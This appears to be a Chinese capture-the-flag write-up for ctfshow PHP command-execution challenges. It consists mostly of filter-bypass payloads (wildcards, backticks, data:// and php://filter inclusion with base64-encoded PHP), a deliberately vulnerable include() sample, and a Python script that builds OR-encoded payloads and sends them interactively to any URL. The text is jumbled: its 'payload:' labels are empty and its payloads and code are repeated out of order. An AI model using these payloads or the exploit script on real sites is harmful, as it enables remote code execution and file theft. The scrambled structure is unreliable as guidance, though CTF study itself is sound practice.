过滤了flag
payload:
随便写几个姿势
过滤了flag|system|php
用echo 反引号来执行命令
payload:
过滤了flag|system|php|cat|sort|shell|\.| |
没关系,我们有都是姿势
payload:
include不用括号,分号可以用?>代替。
payload:
payload:
payload:
过滤了flag
payload:
payload:
理论上是异或
然后我懒
贴exp:
exp取自https://wp.ctf.show/d/137-ctfshow-web-web41/4
/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃
%0a、%26、||截断
payload:
过滤了;|cat
payload:
多过滤了个flag
通配符搞定
payload:
空格被过滤了
payload:
过滤了\;|cat|flag| |[0-9]|\\$|\*/
payload:
payload:
payload:
payload:
payload:
= = 只能是数字
对不起骚套路开始
payload:
https://blog.csdn.net/qq_46091464/article/details/108513145
数据包:
凑36
-37取反=36
payload:
绕过disable_functions
我只想到一种
file可以把文件读取到一个数组,再打印出来
payload:
payload:
payload:
= = 好家伙
ban的真多
payload:
ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲
此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容,必须在ob_end_clean()之前调用ob_get_contents(),因为当调用ob_end_clean()时缓冲区内容将被丢弃。
https://blog.csdn.net/solitudi/article/details/109837640?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163062881716780269897928%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163062881716780269897928&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-109837640.first_rank_v2_pc_rank_v29&utm_term=y4tacker+%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1018.2226.3001.4187 y4的blog说的很清楚
payload:
看一下y4的blog就可以了= = payload不贴了 太长了。
##web73
看一下目录
然后
payload:
同73题
扫目录
mysql load_file读文件
不是很清楚这个题怎么做
但是我复现了一下
https://www.laruence.com/2020/03/11/5475.html
https://blog.csdn.net/miuzzx/article/details/108619930
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php%20system("nl%20f*");?>
/?c=data://text/palin,<?php%20system("nl%20f*");?>
import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
for j in range(256):
if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
k = i | j
if k>=32 and k<=126:
a = '%' + hex(i)[2:].zfill(2)
b = '%' + hex(j)[2:].zfill(2)
content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)
import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
for j in range(256):
if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
k = i | j
if k>=32 and k<=126:
a = '%' + hex(i)[2:].zfill(2)
b = '%' + hex(j)[2:].zfill(2)
content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php")
if(len(argv)!=2):
print("="*50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("="*50)
exit(0)
url=argv[1]
def action(arg):
s1=""
s2=""
for i in arg:
f=open("rce_or.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
s1+=t[2:5]
s2+=t[6:9]
break
f.close()
output="(\""+s1+"\"|\""+s2+"\")"
return(output)
while True:
param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
data={
'c':urllib.parse.unquote(param)
}
r=requests.post(url,data=data)
print("\n[*] result:\n"+r.text)
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php")
if(len(argv)!=2):
print("="*50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("="*50)
exit(0)
url=argv[1]
def action(arg):
s1=""
s2=""
for i in arg:
f=open("rce_or.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
s1+=t[2:5]
s2+=t[6:9]
break
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
